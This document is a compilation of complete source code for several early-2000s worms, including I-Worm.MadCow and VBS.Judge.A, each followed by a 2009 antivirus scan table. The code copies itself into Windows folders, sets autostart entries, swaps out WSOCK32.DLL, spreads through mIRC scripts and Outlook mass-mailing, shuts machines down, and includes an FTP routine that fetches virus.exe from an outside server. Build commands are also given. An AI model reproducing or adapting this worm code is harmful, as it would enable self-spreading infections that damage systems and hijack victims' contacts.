extrn CloseHandle:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn Sleep:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
extrn GetSystemTime:PROC

;USER32.dll
extrn MessageBoxA:PROC
extrn SwapMouseButton:PROC
extrn ExitWindowsEx:PROC
extrn GetVersionExA:PROC

;ADVAPI32.dll
extrn RegCreateKeyExA:PROC
extrn RegCloseKey:PROC

.data
szOrig  db 260 dup (0)
szCopie db 260 dup (0)
szWsk1  db 260 dup (0)
szWsk2  db 260 dup (0)
szWin   db 260 dup (0)
szWin2  db 260 dup (0)
fh      dd 0
octets  dd 0
regDisp dd 0
regResu dd 0
Copie   db "\WinExec.exe",00h
Wsk1    db "\WSOCK32.DLL",00h
Wsk2    db "\WSOCK32.TPK",00h
Wininit db "\\WININIT.INI",00h
windows db "windows",00h
run     db "run",00h
Winini  db "\\WIN.INI",00h
nul     db "NUL",00h
rename  db "Rename",00h
ini     db "C:\script.tpk",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\program files\mirc\script.ini",00h
script4 db "C:\program files\mirc32\script.ini",00h
CLE     db "Software\[PandaKiller]",00h
TITRE   db "Error Loader",00h
TEXTE   db "Windows NT required !",0dh,0ah
        db "This program will be terminated",00h
inid    db "[script]",0dh,0ah
        db "n0=on 1:start:{",0dh,0ah
        db "n1=.remote on",0dh,0ah
        db "n2=.ctcps on",0dh,0ah
        db "n3= .events on",0dh,0ah
        db "n4=}",0dh,0ah
        db "n5=on 1:join:#:{",0dh,0ah
        db "n6= if ( $nick == $me ) { halt } | .dcc "
        db "send $nick C:\Windows\WinExec.exe",0dh,0ah
        db "n7=}",0dh,0ah
initaille equ $-inid

SYSTIME struct
        wYear         WORD ?
        wMonth        WORD ?
        wDayOfWeek    WORD ?
        wDay          WORD ?
        wHour         WORD ?
        wMinute       WORD ?
        wsecond       WORD ?
        wMilliseconds WORD ?
SYSTIME ends
SystemTime SYSTIME <>
.code
DEBUT:
        mov eax, offset CLE             ; Checks whether a key [PandaKiller]
        call REG                        ; exists in HKLM\Software.
        cmp [regDisp],1                 ; If it is not there,
        jne FICHIER                     ; install the components.

WCOPIE:
        push 0                          ;
        call GetModuleHandleA           ;
        push 260                        ; The program copies itself into the
        push offset szOrig              ;
        push eax                        ;
        call GetModuleFileNameA         ; computer's WINDOWS folder
        push 260                        ;
        push offset szCopie             ; under the name WinExec.exe
        call GetWindowsDirectoryA       ;
        push offset Copie               ;
        push offset szCopie             ;
        call lstrcat                    ;
        push 0                          ;
        push offset szCopie             ;
        push offset szOrig              ;
        call CopyFileA                  ;

WIN_INI:
        push 260                        ; Put an entry in WIN.INI so that
        push offset szWin2              ; the program is started at every
        call GetWindowsDirectoryA       ; boot. This avoids using the
        push offset Winini              ; REGISTRY, which is too conspicuous.
        push offset szWin2              ;
        call lstrcat                    ;
        push offset szWin2              ; In WIN.INI of the WINDOWS folder:
        push offset szCopie             ; "program name"
        push offset run                 ; run=
        push offset windows             ; [windows]
        call WritePrivateProfileStringA ;

WSOCK32:
        push 260                        ;
        push offset szWsk1              ; Here the SYSTEM directory file
        call GetSystemDirectoryA        ; WSOCK32.DLL is copied to
        push 260                        ;
        push offset szWsk2              ; WSOCK32.TPK in the same
        call GetSystemDirectoryA        ; SYSTEM directory.
        push offset Wsk1                ;
        push offset szWsk1              ;
        call lstrcat                    ;
        push offset Wsk2                ;
        push offset szWsk2              ;
        call lstrcat                    ;
        push 0                          ;
        push offset szWsk2              ;
        push offset szWsk1              ;
        call CopyFileA                  ;

WININIT:
        push 260                        ; So that the computer uses the
        push offset szWin               ; new file WSOCK32.TPK, write into
        call GetWindowsDirectoryA       ; WININIT.INI in the WINDOWS
        push offset Wininit             ; directory.
        push offset szWin               ; The routine is simple:
        call lstrcat                    ;
        push offset szWin               ;
        push offset szWsk1              ;
        push offset nul                 ;
        push offset rename              ; [Rename]
        call WritePrivateProfileStringA ; NUL=%system%\WSOCK32.DLL
        push offset szWin               ;
        push offset szWsk2              ;
        push offset szWsk1              ;
        push offset rename              ;
        call WritePrivateProfileStringA ; %sys%\WSOCK32.DLL=%sys%\WSOCK32.TPK
        jmp FICHIER

REG:
        push offset regDisp             ;
        push offset regResu             ;
        push 0                          ; default security descriptor
        push 0F003FH                    ; KEY_ALL_ACCESS
        push 0                          ;
        push 0                          ;
        push 0                          ;
        push eax                        ; address of the subkey
        push 80000002h                  ; HKEY_LOCAL_MACHINE
        call RegCreateKeyExA            ;
SUITE:
        push [regResu]                  ;
        call RegCloseKey                ;
        ret

FICHIER:
        push 00000000h                  ; Here is one of the most convenient
        push 00000080h                  ; ways to send our program all over
        push 00000002h                  ; the place:
        push 00000000h                  ;
        push 00000001h                  ; mIRC.
        push 40000000h                  ;
        push offset ini                 ; Using a script, mIRC automatically
        call CreateFileA                ; sends our program to everyone
        mov [fh],eax                    ; in the victim's CHANNEL.
        push 00h                        ;
        push offset octets              ;
        push initaille                  ; To do that, write the script
        push offset inid                ; into the C:\ folder.
        push [fh]                       ;
        call WriteFile                  ;
        push [fh]                       ;
        call CloseHandle                ;

COPIE:
        push 00000000h                  ; Then copy it into the
        push offset script1             ; following folders:
        push offset ini                 ;
        call CopyFileA                  ; C:\mirc
        push 00000000h                  ;
        push offset script2             ;
        push offset ini                 ;
        call CopyFileA                  ; C:\mirc32
        push 00000000h                  ;
        push offset script3             ;
        push offset ini                 ;
        call CopyFileA                  ; C:\program files\mirc
        push 00000000h                  ;
        push offset script4             ;
        push offset ini                 ;
        call CopyFileA                  ; C:\program files\mirc32
        push 00h                        ;
        push offset ini                 ;
        call DeleteFileA                ; Then delete the original.

ATTEND:
        push 60 * 1 * 1000              ;
        call Sleep                      ; Pause for 1 minute.

SOURIS:
        push 01h                        ;
        call SwapMouseButton            ; Swaps the mouse buttons.

HEURE2:
        push offset SystemTime          ;
        call GetSystemTime              ; Reads the system date.
        cmp [SystemTime.wYear],7D1h     ; If the year is not 2001,
        jne ALERT                       ; jump to label ALERT.
ETEIND:
        push 01h                        ;
        call ExitWindowsEx              ; Otherwise shut the computer down.
ALERT:
        push 10h                        ;
        push offset TITRE               ; Shows the fake error message.
        push offset TEXTE               ;
        push 0                          ;
        call MessageBoxA                ;
FIN:
        push 0                          ;
        call ExitProcess                ; End of program
end DEBUT

File W95PK.exe received on 05.16.2009 10:42:08 (CET)
Antivirus          Version          Last Update   Result
a-squared          4.0.0.101        2009.05.16    -
AhnLab-V3          5.0.0.2          2009.05.15    -
AntiVir            7.9.0.168        2009.05.15    HEUR/Malware
Antiy-AVL          2.0.3.1          2009.05.15    -
Authentium         5.1.2.4          2009.05.15    -
Avast              4.8.1335.0       2009.05.15    -
AVG                8.5.0.336        2009.05.15    IRC/Generic.dropper
BitDefender        7.2              2009.05.16    BehavesLike:Win32.IRC-Worm
CAT-QuickHeal      10.00            2009.05.15    -
ClamAV             0.94.1           2009.05.15    W32.Ultratt.gz
Comodo             1157             2009.05.08    -
DrWeb              5.0.0.12182      2009.05.16    BACKDOOR.Trojan
eSafe              7.0.17.0         2009.05.14    -
eTrust-Vet         31.6.6508        2009.05.16    -
F-Prot             4.4.4.56         2009.05.15    -
F-Secure           8.0.14470.0      2009.05.15    W32/P2PWorm
Fortinet           3.117.0.0        2009.05.16    -
GData              19               2009.05.16    BehavesLike:Win32.IRC-Worm
Ikarus             T3.1.1.49.0      2009.05.16    -
K7AntiVirus        7.10.735         2009.05.14    -
Kaspersky          7.0.0.125        2009.05.16    IRC-Worm.DOS.Generic
McAfee             5616             2009.05.15    New Malware.b
McAfee+Artemis     5616             2009.05.15    New Malware.b
McAfee-GW-Edition  6.7.6            2009.05.15    Heuristic.Malware
Microsoft          1.4602           2009.05.16    -
NOD32              4080             2009.05.15    probably unknown NewHeur_PE
Norman             6.01.05          2009.05.16    W32/P2PWorm
nProtect           2009.1.8.0       2009.05.16    -
Panda              10.0.0.14        2009.05.15    -
PCTools            4.4.2.0          2009.05.15    IRC.Buffy.C
Prevx              3.0              2009.05.16    -
Rising             21.29.51.00      2009.05.16    -
Sophos             4.41.0           2009.05.16    -
Sunbelt            3.2.1858.2       2009.05.16    -
Symantec           1.4.4.12         2009.05.16    W95.Pet_Tick.gen
TheHacker          6.3.4.1.326      2009.05.15    -
TrendMicro         8.950.0.1092     2009.05.15    Possible_Virus
VBA32              3.12.10.5        2009.05.16    -
ViRobot            2009.5.15.1737   2009.05.15    -
VirusBuster        4.6.5.0          2009.05.15    IRC.Buffy.C
Additional information
File size: 8192 bytes
MD5...: f7b2facb5e2c9e5870065004446a8867
SHA1..: 837ce36b596ffab1af92ac1c63506fa613e16e6c

comment *
///// I-Worm.MadCow by PetiK ///// 25/11/2000

To assemble:
tasm32 /M /ML madcow.asm
tlink32 -Tpe -aa -x madcow.obj,,,import32.lib
*

jumps
locals
.386
.model flat,stdcall
;KERNEL32.dll
extrn lstrcat:PROC
extrn WritePrivateProfileStringA:PROC
extrn CloseHandle:PROC
extrn CopyFileA:PROC
extrn CreateDirectoryA:PROC
extrn CreateFileA:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn GetModuleFileNameA:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn MoveFileA:PROC
extrn WinExec:PROC
extrn WriteFile:PROC

;ADVAPI32.dll
extrn RegSetValueExA:PROC
extrn RegCreateKeyExA:PROC
extrn RegCloseKey:PROC

.data
regDisp dd 0
regResu dd 0
l       dd 0
p       dd 0
fh      dd 0
octets  dd ?
szOrig  db 260 dup (0)
szOrig2 db 260 dup (0)
szCopie db 260 dup (0)
szCopi2 db 260 dup (0)
szCico  db 260 dup (0)
szWin   db 260 dup (0)
Dossier db "C:\Win32",00h
fichier db "C:\Win32\Salut.ico",00h
Copico  db "\MSLS.ICO",00h
Copie   db "\Wininet32.exe",00h
Copie2  db "\MadCow.exe",00h
BATFILE db "C:\Win32\ENVOIE.BAT",00h
VBSFILE db "C:\Win32\ENVOIE.VBS",00h
Winini  db "\\WIN.INI",00h
run     db "run",00h
windows db "windows",00h
fileini db "C:\Win32\script.ini",00h
Copie3  db "C:\Win32\MadCow.exe",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\program files\mirc\script.ini",00h
script4 db "C:\program files\mirc32\script.ini",00h
CLE     db "Software\[Atchoum]",00h
CLE2    db "\exefile\DefaultIcon",00h
Signature db "IWorm.MadCow par PetiK (c)2000"

vbsd:
        db 'DEBUT()',0dh,0ah
        db 'Sub DEBUT()',0dh,0ah
        db 'EMAIL()',0dh,0ah
        db 'End Sub',0dh,0ah
        db '',0dh,0ah
        db 'Sub EMAIL()',0dh,0ah
        db 'Set K = CreateObject("Outlook.Application")',0dh,0ah
        db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah
        db 'For Each M In L.AddressLists',0dh,0ah
        db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
        db 'Set N = K.CreateItem(0)',0dh,0ah
        db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
        db 'Set P = M.AddressEntries(O)',0dh,0ah
        db 'If O = 1 Then',0dh,0ah
        db 'N.BCC = P.Address',0dh,0ah
        db 'Else',0dh,0ah
        db 'N.BCC = N.BCC & "; " & P.Address',0dh,0ah
        db 'End If',0dh,0ah
        db 'Next',0dh,0ah
        db 'N.Subject = "Pourquoi les vaches sont-elles folles ?"',0dh,0ah
        db 'N.Body = "Voila un rapport expliquant la folie des vaches"',0dh,0ah
        db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah
        db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"MadCow.exe")',0dh,0ah
        db 'N.Send',0dh,0ah
        db 'End If',0dh,0ah
        db 'Next',0dh,0ah
        db 'End Sub',0dh,0ah
vbstaille equ $-vbsd

batd:
        db '@echo off',0dh,0ah
        db 'start C:\Win32\ENVOIE.VBS',0dh,0ah
battaille equ $-batd

inid:
        db "[script]",0dh,0ah
        db "n0=on 1:JOIN:#:{",0dh,0ah
        db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
        db "n2= /.dcc send $nick C:\Win32\MadCow.exe",0dh,0ah
        db "n3=}",00h
initaille equ $-inid

include icone.inc
.code
DEBUT:
VERIF:
        mov eax,offset CLE              ; Checks whether a key [Atchoum]
        call REG                        ; exists in HKLM\Software.
        cmp [regDisp],1                 ; If it is not there,
        jne INIFILE                     ; install the components.

COPIE:
        push 0                          ;
        call GetModuleHandleA           ;
        push 260                        ;
        push offset szOrig              ;
        push eax                        ;
        call GetModuleFileNameA         ; Copies the original file
        push 260                        ;
        push offset szCopie             ;
        call GetSystemDirectoryA        ; into the SYSTEM folder
        push offset Copie               ;
        push offset szCopie             ;
        call lstrcat                    ; under the name Wininet32.exe
        push 00h                        ;
        push offset szCopie             ;
        push offset szOrig              ;
        call CopyFileA                  ;
        push 260                        ; then
        push offset szCopi2             ;
        call GetWindowsDirectoryA       ; again into the WINDOWS folder
        push offset Copie2              ;
        push offset szCopi2             ;
        call lstrcat                    ; under the name MadCow.exe
        push 00h                        ;
        push offset szCopi2             ;
        push offset szOrig              ;
        call CopyFileA                  ;

WIN_INI:
        push 260                        ; To launch the program, either the
        push offset szWin               ;
        call GetWindowsDirectoryA       ; registry or the WIN.INI file in the
        push offset Winini              ;
        push offset szWin               ; WINDOWS folder can be used.
        call lstrcat                    ;
        push offset szWin               ; The procedure is simple:
        push offset szCopie             ; [windows]
        push offset run                 ; run="program name"
        push offset windows             ;
        call WritePrivateProfileStringA ;

DIR:
        push 00h                        ; Creates C:\Win32 here
        push offset Dossier             ;
        call CreateDirectoryA           ;

EMAIL:
        push 00000000h                  ; Creates C:\Win32\ENVOIE.VBS
        push 00000080h                  ;
        push 00000002h                  ;
        push 00000000h                  ;
        push 00000001h                  ;
        push 40000000h                  ;
        push offset VBSFILE             ;
        call CreateFileA                ;
        mov [fh],eax                    ;
        push 00h                        ;
        push offset octets              ;
        push vbstaille                  ;
        push offset vbsd                ;
        push [fh]                       ;
        call WriteFile                  ;
        push [fh]                       ;
        call CloseHandle                ;

EXEC:
        push 00000000h                  ; and C:\Win32\ENVOIE.BAT,
        push 00000080h                  ;
        push 00000002h                  ; which runs ENVOIE.VBS
        push 00000000h                  ;
        push 00000001h                  ;
        push 40000000h                  ;
        push offset BATFILE             ;
        call CreateFileA                ;
        mov [fh],eax                    ;
        push 00h                        ;
        push offset octets              ;
        push battaille                  ;
        push offset batd                ;
        push [fh]                       ;
        call WriteFile                  ;
        push [fh]                       ;
        call CloseHandle                ;
        jmp EXECBAT                     ;

REG:
        push offset regDisp             ;
        push offset regResu             ;
        push 0                          ;
        push 0F003Fh                    ;
        push 0                          ;
        push 0                          ;
        push 0                          ;
        push eax                        ; Software\[Atchoum]
        push 80000002h                  ; HKEY_LOCAL_MACHINE
        call RegCreateKeyExA            ;
        push [regResu]                  ; the handle is in regResu
        call RegCloseKey                ;
        ret                             ;

INIFILE:
        push 00000000h                  ; Creates in C:\Win32
        push 00000001h                  ;
        push 00000002h                  ; the file script.ini,
        push 00000000h                  ;
        push 00000001h                  ; read-only.
        push 40000000h                  ;
        push offset fileini             ;
        call CreateFileA                ;
        mov [fh],eax                    ;
        push 00h                        ;
        push offset octets              ;
        push initaille                  ;
        push offset inid                ;
        push [fh]                       ;
        call WriteFile                  ;
        push [fh]                       ;
        call CloseHandle                ;

        push 00h                        ; Copies this file into the
        push offset script1             ; following directories:
        push offset fileini             ;
        call CopyFileA                  ; C:\mirc, C:\mirc32,
        test eax,eax                    ; C:\program files\mirc and
        jnz COPYWIN                     ; C:\program files\mirc32.
        push 00h                        ;
        push offset script2             ; If it manages to copy into one
        push offset fileini             ; of these files, it creates a
        call CopyFileA                  ; copy of the program in C:\Win32
        test eax,eax                    ; under the name MadCow.exe.
        jnz COPYWIN                     ;
        push 00h                        ;
        push offset script3             ;
        push offset fileini             ;
        call CopyFileA                  ;
        test eax,eax                    ;
        jnz COPYWIN                     ;
        push 00h                        ;
        push offset script4             ;
        push offset fileini             ;
        call CopyFileA                  ;
        test eax,eax                    ;
        jz ICOFILE                      ;

COPYWIN:
        push 0                          ;
        call GetModuleHandleA           ;
        push 260                        ;
        push offset szOrig2             ;
        push eax                        ;
        call GetModuleFileNameA         ; Copies the original file
        push 00h                        ;
        push offset Copie3              ;
        push offset szOrig2             ;
        call CopyFileA                  ;
        jmp FIN                         ;

ICOFILE:
        push 00000000h                  ; Creates the file Salut.ico
        push 00000080h                  ;
        push 00000002h                  ; at the root of the hard disk
        push 00000000h                  ;
        push 00000001h                  ;
        push 40000000h                  ;
        push offset fichier             ;
        call CreateFileA                ;
        mov [fh],eax                    ;
        push 00h                        ;
        push offset octets              ;
        push icotaille                  ;
        push offset icod                ;
        push [fh]                       ;
        call WriteFile                  ;
        push [fh]                       ;
        call CloseHandle                ;
        push 260                        ; Moves the file Salut.ico
        push offset szCico              ;
        call GetSystemDirectoryA        ; into the SYSTEM folder as
        push offset Copico              ;
        push offset szCico              ; MSLS.ICO
        call lstrcat                    ;
        push offset szCico              ;
        push offset fichier             ;
        call MoveFileA                  ; => done
REG2:
        push offset l                   ;
        push offset p                   ;
        push 0                          ;
        push 1F0000h + 1 + 2h           ;
        push 0                          ;
        push 0                          ;
        push 0                          ;
        push offset CLE2                ; \exefile\DefaultIcon
        push 80000000h                  ; HKEY_CLASSES_ROOT
        call RegCreateKeyExA            ;
        push 05h                        ;
        push offset szCico              ; %system%\MSLS.ico
        push 01h                        ;
        push 0                          ;
        push 00h                        ; DEFAULT VALUE
        push p                          ;
        call RegSetValueExA             ; CREATES THE VALUE
        push 0                          ;
        call RegCloseKey                ; CLOSES THE REGISTRY
        jmp FIN                         ; THEN ENDS THE PROGRAM

EXECBAT:
        push 01h                        ; Runs the file ENVOIE.BAT
        push offset BATFILE             ;
        call WinExec                    ;

FIN:
        push 00h                        ; END OF PROGRAM
        call ExitProcess                ;
end DEBUT

File MadCow.exe received on 05.16.2009 17:51:57 (CET)
Antivirus          Version          Last Update   Result
a-squared          4.0.0.101        2009.05.16    Email-Worm.Win32.Petik!IK
AhnLab-V3          5.0.0.2          2009.05.16    Win32/PetTick.worm.8192
AntiVir            7.9.0.168        2009.05.15    Worm/Petik
Antiy-AVL          2.0.3.1          2009.05.15    Worm/Win32.Win32
Authentium         5.1.2.4          2009.05.16    W32/Petik.E
Avast              4.8.1335.0       2009.05.15    IRC:Generic-008
AVG                8.5.0.336        2009.05.15    I-Worm/Petik
BitDefender        7.2              2009.05.16    Generic.Malware.IM.5B177226
CAT-QuickHeal      10.00            2009.05.15    W32.Petik.A
ClamAV             0.94.1           2009.05.16    Worm.Madcow
Comodo             1157             2009.05.08    Worm.Win32.Petik.Z
DrWeb              5.0.0.12182      2009.05.16    Win32.Petik.8192
eSafe              7.0.17.0         2009.05.14    -
eTrust-Vet         31.6.6508        2009.05.16    Win32/Petik.8192.B/C
F-Prot             4.4.4.56         2009.05.16    W32/Petik.E
F-Secure           8.0.14470.0      2009.05.15    Email-Worm.Win32.Petik
Fortinet           3.117.0.0        2009.05.16    W32/Petik.E@mm
GData              19               2009.05.16    Generic.Malware.IM.5B177226
Ikarus             T3.1.1.49.0      2009.05.16    Email-Worm.Win32.Petik
K7AntiVirus        7.10.737         2009.05.16    Email-Worm.Win32.Petik
Kaspersky          7.0.0.125        2009.05.16    Email-Worm.Win32.Petik
McAfee             5616             2009.05.15    W32/PetTick@MM
McAfee+Artemis     5616             2009.05.15    W32/PetTick@MM
McAfee-GW-Edition  6.7.6            2009.05.15    Worm.Petik
Microsoft          1.4602           2009.05.16    Worm:Win32/Petick@mm
NOD32              4080             2009.05.15    Win32/Petik.Z
Norman             6.01.05          2009.05.16    W32/Pet_Tick.8192.D
nProtect           2009.1.8.0       2009.05.16    -
Panda              10.0.0.14        2009.05.16    W32/Petik.A
PCTools            4.4.2.0          2009.05.16    VBS.LoveLetter
Prevx              3.0              2009.05.16    -
Rising             21.29.52.00      2009.05.16    Worm.Mail.Petik.x
Sophos             4.41.0           2009.05.16    W32/Petik-A
Sunbelt            3.2.1858.2       2009.05.16    Email-Worm.Win32.Petik
Symantec           1.4.4.12         2009.05.16    W95.Pet_Tick.gen
TheHacker          6.3.4.1.326      2009.05.15    W32/PetTick@MM
TrendMicro         8.950.0.1092     2009.05.15    WORM_PETIK.E
VBA32              3.12.10.5        2009.05.16    Win32.Worm.Petik.8192
ViRobot            2009.5.15.1737   2009.05.15    -
VirusBuster        4.6.5.0          2009.05.16    VBS.LoveLetter
Additional information
File size: 8192 bytes
MD5...: 15b037d0d23a915fb0a78961cdc7299a
SHA1..: 85864e397e3fee261bdcb62b477a71e936db39f6

;By M.Xxxxxxx XXXXXXX (c)2000
;SIZE: 1034 BYTES
;DWARF4 SETS THE DATE TO 26 DECEMBER 1999
;C:\DWARF.VBS, WHICH ADDS A KEY TO THE REGISTRY
;C:\WINDOWS\DWARF.BAT, WHICH DISPLAYS A MESSAGE AT EVERY STARTUP
.model small
.code
org 100h

DATE:
        mov ah,2Bh
        mov dh,12
        mov dl,26
        mov cx,1999
        int 21h                 ;26 DECEMBER 1999
HEURE:
        mov ah,2Dh
        xor cx,cx
        xor dx,dx
        int 21h                 ;MIDNIGHT
FILE1:
        mov ah,3Ch
        xor cx,cx
        mov dx,offset NOM1
        int 21h                 ;create the 1st file
        xchg ax,bx
        mov ah,40h
        mov cx,progl1
        mov dx,offset prog1
        int 21h                 ;write
        mov ah,3Eh
        int 21h                 ;close
FILE2:
        mov ah,3Ch
        xor cx,cx
        mov dx,offset NOM2
        int 21h                 ;create the 2nd file
        xchg ax,bx
        mov ah,40h
        mov cx,progl2
        mov dx,offset prog2
        int 21h                 ;write
        mov ah,3Eh
        int 21h                 ;close
MESSAGE:
        mov ax,3
        int 10h
        mov ah,9
        lea dx,msg
        int 21h
FIN:
        mov ah,4Ch
        int 21h

NOM1    db 'c:\dwarf.vbs',0
NOM2    db 'c:\WINDOWS\Panda.bat',0
prog1   db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah
        db 'msgbox "BONNO JOURNEE ?"',0Dh,0Ah
        db 'Dim W',0Dh,0Ah
        db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah
        db 'W.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
        db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\dwarf.bat"'
progl1  equ $-prog1
prog2   db '@echo off',0Dh,0Ah
        db 'if exist c:\dwarf.vbs del c:\dwarf.vbs',0Dh,0Ah
        db 'cls',0Dh,0Ah
        db 'echo.',0Dh,0Ah
        db 'echo UNE BOMBE A ETE PLACE DANS TON ORDINATEUR',0Dh,0Ah
        db 'echo.',0Dh,0Ah
        db 'echo DANS 5 SECONDES TU VAS MOURIR',0Dh,0Ah
        db 'echo.',0Dh,0Ah
        db 'choice /c:Q /t:Q,5 /n Le compte à rebours a commencé',0Dh,0Ah
        db 'if errorlevel 1 goto Die',0Dh,0Ah
        db ':Die',0Dh,0Ah
        db 'cls',0Dh,0Ah
        db 'echo.',0Dh,0Ah
        db 'echo.',0Dh,0Ah
        db 'echo.',0Dh,0Ah
        db 'echo.',0Dh,0Ah
        db 'echo.',0Dh,0Ah
        db 'echo *** *** *** * *',0Dh,0Ah
        db 'echo * * * * * * ** **',0Dh,0Ah
        db 'echo * * * * * * * * *',0Dh,0Ah
        db 'echo * * * * * * * *',0Dh,0Ah
        db 'echo * * * * * * * *',0Dh,0Ah
        db 'echo * * * * * * * *',0Dh,0Ah
        db 'echo *** *** *** * *',0Dh,0Ah
progl2  equ $-prog2
CORBEILLE db 'C:\RECYCLED\*.*',0
msg     db 7,7,7,10,13,'UN FICHIER A ETE CREE',0Ah,0Ah,0Dh
        db 'IL SE NOMME C:\dwarf.vbs',10,10,13
        db 'OUVRE LE VITE $'
end DATE

' Name     : VBS.Judge.A
' Author   : PetiK
' Language : VBS
' Date     : 08/12/2000
' Copy itself to %windir%\WinGDI.EXE.vbs and C:\Judge.TXT.vbs
' Add to HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\
'   WinGDI = %windir%\WinGDI.EXE.vbs
' Function EMAIL : scans the address book and sends a mail with a copy.

'VBS.Judge.A by Petik (c)2000

Dim fso,ws,file
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbs = file.ReadAll

DEBUT()

Sub DEBUT()
Set win = fso.GetSpecialFolder(0)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(win&"\WinGDI.EXE.vbs")
c.Copy("C:\Judge.TXT.vbs")
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\WinGDI",win&"\WinGDI.EXE.vbs"
EMAIL()
'FTP()
'AUTOEXEC()
TXT()
End Sub

Sub EMAIL()
If Not fso.FileExists("C:\Judge.txt") Then
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AddList.AddressEntries.Count
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "BatMan, SpiderMan et les autres"
msg.Body = "La vraie histoire de ces justiciers"
msg.Attachments.Add "C:\Judge.TXT.vbs"
msg.DeleteAfterSubmit = True
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
end if
End If
End Sub

Sub FTP()
If Not fso.FileExists("C:\Judge.txt") Then
Set bat = fso.CreateTextFile(win&"\FTP.bat")
bat.WriteLine "@echo off"
bat.WriteLine "start ftp -i -v -s:C:\FTP.drv"
bat.close
Set drv = fso.CreateTextFile("C:\FTP.drv")
drv.WriteLine "open"
drv.WriteLine "members.aol.com"
drv.WriteLine "pentasm99"
drv.WriteLine "binary"
drv.WriteLine "lcd C:\"
drv.WriteLine "get virus.exe"
drv.WriteLine "bye"
drv.WriteLine "exit"
drv.close
ws.Run (win&"\FTP.bat")
End If
End Sub

Sub AUTOEXEC()
If Day(Now) = 1 then
Set FileObj = CreateObject("Scripting.FileSystemObject")
file = "c:\autoexec.bat"
Set InStream= FileObj.OpenTextFile (file, 1, False, False)
TLine = Instream.Readall
Set autobat= FileObj.CreateTextFile (file, True, False)
autobat.write(tline)
autobat.WriteBlankLines(1)
autobat.WriteLine "@echo off"
autobat.WriteLine "cls"
autobat.WriteLine "echo."
autobat.WriteLine "echo."
autobat.WriteLine "echo VBS.Judge.A par PetiK (c)2000"
autobat.WriteLine "echo."
autobat.WriteLine "echo TON ORDINATEUR VIENT DE MOURIR"
autobat.WriteLine "pause"
End If
End Sub

Sub TXT()
Set ptk = fso.CreateTextFile("C:\Judge.txt")
ptk.WriteLine "Si vous lisez ce texte,"
ptk.WriteLine "c'est que Microsoft a encors fait des siennes"
ptk.Close
Set mp3 = fso.OpenTextFile("C:\Salut.mp3",2,true)
mp3.Write vbs
mp3.close
End Sub

File Judge.TXT.vbs received on 05.16.2009 17:42:50 (CET)

Antivirus | Version | Last Update | Result
a-squared | 4.0.0.101 | 2009.05.16 | Email-Worm.Win32.Petik!IK
AhnLab-V3 | 5.0.0.2 | 2009.05.16 | VBS/Anjulie
AntiVir | 7.9.0.168 | 2009.05.15 | Worm/Petik.AV.03
Antiy-AVL | 2.0.3.1 | 2009.05.15 | Worm/Win32.Win32
Authentium | 5.1.2.4 | 2009.05.16 | VBS/Petik.L@mm
Avast | 4.8.1335.0 | 2009.05.15 | VBS:MailWorm-gen
AVG | 8.5.0.336 | 2009.05.15 | VBS/VBSWG
BitDefender | 7.2 | 2009.05.16 | Generic.ScriptWorm.A9DC8F67
CAT-QuickHeal | 10.00 | 2009.05.15 | -
ClamAV | 0.94.1 | 2009.05.16 | Worm.VBS-14
Comodo | 1157 | 2009.05.08 | -
DrWeb | 5.0.0.12182 | 2009.05.16 | VBS.Petik
eSafe | 7.0.17.0 | 2009.05.14 | -
eTrust-Vet | 31.6.6508 | 2009.05.16 | VBS/Buggy
F-Prot | 4.4.4.56 | 2009.05.16 | VBS/Petik.L@mm
F-Secure | 8.0.14470.0 | 2009.05.15 | Email-Worm.Win32.Petik
Fortinet | 3.117.0.0 | 2009.05.16 | VBS/Judge.A
GData | 19 | 2009.05.16 | Generic.ScriptWorm.A9DC8F67
Ikarus | T3.1.1.49.0 | 2009.05.16 | Email-Worm.Win32.Petik
K7AntiVirus | 7.10.737 | 2009.05.16 | -
Kaspersky | 7.0.0.125 | 2009.05.16 | Email-Worm.Win32.Petik
McAfee | 5616 | 2009.05.15 | VBS/Generic
McAfee+Artemis | 5616 | 2009.05.15 | VBS/Generic
McAfee-GW-Edition | 6.7.6 | 2009.05.15 | Worm.Petik.AV.03
Microsoft | 1.4602 | 2009.05.16 | Virus:VBS/Petik.I
NOD32 | 4080 | 2009.05.15 | VBS/Petik.A
Norman | 6.01.05 | 2009.05.16 | VBS/GenMail.D
nProtect | 2009.1.8.0 | 2009.05.16 | VBS.Petik.A@mm
Panda | 10.0.0.14 | 2009.05.16 | VBS/I-Worm
PCTools | 4.4.2.0 | 2009.05.16 | VBS.Petik.I
Prevx | 3.0 | 2009.05.16 | -
Rising | 21.29.52.00 | 2009.05.16 | Worm.Hopalong
Sophos | 4.41.0 | 2009.05.16 | VBS/Judge
Sunbelt | 3.2.1858.2 | 2009.05.16 | -
Symantec | 1.4.4.12 | 2009.05.16 | VBS.Pet_Tick.B@mm
